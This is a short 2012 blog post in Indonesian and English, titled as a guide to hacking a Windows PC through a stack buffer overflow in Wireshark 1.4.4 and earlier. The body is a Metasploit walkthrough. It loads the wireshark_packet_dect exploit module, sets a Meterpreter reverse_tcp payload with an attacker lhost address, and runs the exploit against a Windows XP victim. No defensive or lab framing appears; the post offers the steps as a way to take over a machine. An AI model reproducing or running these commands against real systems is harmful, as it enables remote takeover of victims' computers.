Warung Online
Headlines News :
mas template
Home » , » Hack Windows PC using Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)

Hack Windows PC using Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)

Written By Trik Cari Duit on Jumat, 25 Mei 2012 | 11.07


This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending a malicious packet.

Exploit Targets
Wireshark 1.4.4

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/multi/misc/wireshark_packet_dect

Msf exploit (wireshark_packet_dect)>set payload windows/meterpreter/reverse_tcp
Msf exploit (wireshark_packet_dect)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (wireshark_packet_dect)>exploit    

Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.



Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger